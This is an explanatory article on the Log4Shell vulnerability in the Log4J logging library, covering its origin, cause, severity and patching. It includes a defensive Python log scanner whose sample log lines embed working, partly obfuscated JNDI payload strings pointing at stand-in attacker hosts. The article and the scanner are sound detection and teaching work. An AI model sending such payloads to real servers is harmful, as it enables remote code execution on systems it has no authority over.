In December 2021, videos emerged of attackers exploiting a feature of the popular video game Minecraft. The game has a built-in chat function through which players send messages to each other, and the servers hosting the game write those messages to their logs, presumably so that administrators can monitor what is being said on their server.
It was in this inconspicuous logging step that the Log4Shell vulnerability arose: one of the most dangerous security vulnerabilities identified in the past decade.
Attackers realised that a specially crafted chat message would make the server's logging library, Log4J, fetch and run code of their choosing; with devastating results.
Initially, some observers believed that this vulnerability would be limited to Minecraft servers. However, on closer examination it became clear that any Java application that logged attacker-controlled text was exposed, which meant a huge number of servers could be vulnerable. Panic quickly set in, and system administrators around the world scrambled to patch their systems.
What is Log4J?
Log4J is one of the most widely used logging libraries available. It's a free, open-source Java library maintained by the Apache Software Foundation and adopted across the internet, with even the big hitters such as Amazon Web Services (AWS) using it.
Its job is to log the events that take place inside an application: what users do, what error messages appear, and so on.
For example, if you click on a broken link on a website, you may be redirected to a 404 error page. A 404 error is a web server's way of telling you that the page you are looking for doesn't exist. The role of a logging library such as Log4J is to record such 'events' in a log file, which can later be used by system administrators looking to squash bugs. Logging is crucial for good management as well as for IT security and forensics.
What was the Log4Shell vulnerability?
In December 2021, a zero-day vulnerability in Log4J, reported to Apache by researchers from the Alibaba Cloud Security Team, was publicly disclosed and quickly became known as 'Log4Shell' (tracked as CVE-2021-44228). The vulnerability allowed arbitrary code execution: an attacker could run code of their choosing on any server whose Java application logged text the attacker controlled, not only web servers.
That code could serve a range of nefarious purposes, from opening a remote shell to stealing sensitive information. Vulnerabilities of this class are always dangerous, and, worryingly, Log4Shell was also incredibly easy to exploit.
The root cause was a Log4J feature called message lookups: when a logged message contained a pattern of the form ${...}, Log4J evaluated it before writing the line, and one of the supported lookups, JNDI, could fetch an object from a remote LDAP or RMI server named in the pattern. Attackers would scan the internet for applications running Log4J, then take some action that made the application log text they controlled, such as a chat message or an HTTP User-Agent header, containing a string like ${jndi:ldap://attacker-host/x}. Log4J treated that string not as data but as an instruction to contact the attacker's server, which could answer with a reference to attacker-hosted Java code that the target then loaded and ran.
The result? Attackers could potentially gain full control of the system and run whatever code they pleased.
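As an added example (this is not code from the original article, nor from the Log4J project), here is a Python scanner that applies the mechanism described above in reverse: it takes web-server log lines, resolves nested ${...} lookups innermost-first the way Log4J's string substitution does, and only then looks for a JNDI reference. It goes slightly beyond the plain ${jndi:ldap://...} case because real probes hid the word "jndi" behind other lookups such as ${lower:j} or ${::-j}, which defeats naive string matching. The log lines, hostnames and IP addresses are constructed for the example (documentation address ranges and the reserved .example domain).

```python
"""Scan log lines for Log4Shell (CVE-2021-44228) lookup strings.

Log4J 2.x before 2.16.0 evaluated ${...} lookups inside logged messages, so a
logged ${jndi:ldap://attacker/x} made the JVM contact the attacker's server.
Attackers hid the word "jndi" from naive signature matching by nesting other
lookups, e.g. ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}.
This scanner resolves nested lookups innermost-first, the way Log4J's string
substitution does, and only then looks for a JNDI reference.
"""
from __future__ import annotations

import re
from typing import NamedTuple

# Constructed sample access-log lines (IPs are documentation ranges and the
# hostnames are in the reserved .example domain; nothing here is real
# infrastructure). Lines 2-4 carry payloads; lines 1 and 5 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:01:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:01:02:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.66:1389/a}"
198.51.100.7 - - [10/Dec/2021:01:02:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://evil.example:1389/x}"
198.51.100.8 - - [10/Dec/2021:01:02:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-r}mi://evil.example:1099/y}"
192.0.2.44 - - [10/Dec/2021:01:02:07 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"
"""

# A lookup whose body contains no further ${...}: the innermost one.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI reference as it appears once obfuscation has been resolved.
JNDI_REF = re.compile(r'^jndi:\s*([a-z]+)://([^/\s"]+)', re.IGNORECASE)


class Finding(NamedTuple):
    line_no: int
    scheme: str   # ldap, rmi, dns, ...
    target: str   # host[:port] the victim would have connected to


def evaluate_lookup(body: str) -> str:
    """Evaluate one lookup body (the text between ${ and }) for the handful of
    lookups attackers use purely to obfuscate. Log4J syntax: ${prefix:key} and
    ${key:-default}, where the default is used when the key does not resolve."""
    key, has_default, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if has_default:
        # env:, sys:, or an empty prefix that we deliberately do not resolve:
        # the attacker relies on the fallback value being emitted.
        return default
    # Any other lookup (e.g. ${date:yyyy}) is left as plain text; dropping the
    # ${} wrapper keeps it benign and guarantees the resolver loop terminates.
    return key


def resolve_lookups(message: str, max_steps: int = 64) -> tuple[str, list[tuple[str, str]]]:
    """Resolve nested lookups innermost-first. Returns the normalised text and
    every JNDI reference encountered as (scheme, target) pairs."""
    found: list[tuple[str, str]] = []
    for _ in range(max_steps):   # bound the work: payloads may nest deeply
        m = INNERMOST.search(message)
        if not m:
            break
        body = m.group(1)
        ref = JNDI_REF.match(body)
        if ref:
            found.append((ref.group(1).lower(), ref.group(2)))
            replacement = "<JNDI " + body + ">"   # marker; contains no "${"
        else:
            replacement = evaluate_lookup(body)
        message = message[:m.start()] + replacement + message[m.end():]
    return message, found


def scan_log(text: str) -> list[Finding]:
    """Run the resolver over every line and collect the JNDI findings."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        _, hits = resolve_lookups(line)
        findings.extend(Finding(n, scheme, target) for scheme, target in hits)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: JNDI {f.scheme} lookup to {f.target}")
```

Run against the sample, the scanner reports lines 2, 3 and 4 together with the host each victim would have contacted, and leaves the harmless ${date:yyyy} on line 5 alone. Two caveats a practitioner should keep in mind: a scanner like this finds probes after the fact and is no substitute for patching, and it only resolves the obfuscation lookups seen most often, so treat it as a triage aid rather than a complete signature.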
Why is the Log4Shell vulnerability so serious?
Log4Shell was rated critical, with a CVSS score of 10.0, the highest rating possible. American cybersecurity firm Tenable characterized it as "the single biggest, most critical vulnerability of the last decade."
Arbitrary code execution is one of the most dangerous categories of vulnerability. However, what made Log4Shell exceptional was how widely the library was used; it seemed almost omnipresent in applications built with Java, often buried several layers deep among an application's dependencies, where the people running the application did not even know it was present.
So serious was Log4Shell that national cybersecurity agencies began issuing warnings to organisations that maintain critical infrastructure.
What lessons can be learned from the Log4Shell saga?
Log4Shell caused security engineers many sleepless nights, and some organisations are still feeling its knock-on effects to this day.
Apache has since released patches that remove the dangerous behaviour (the first fix, Log4J 2.15.0, turned out to be incomplete; 2.16.0 removed message lookups and disabled JNDI by default, and the 2.17.x releases addressed further, less severe issues), and most administrators have likely put adequate protections in place to safeguard their assets. The practical check remains the same: find every copy of log4j-core on your systems, including those bundled inside other vendors' products, and confirm its version.
If Log4Shell has taught us anything, it's that a vulnerability in a single, widely used library can cause significant damage to thousands of servers across the world, and that you can only patch the dependencies you know you have.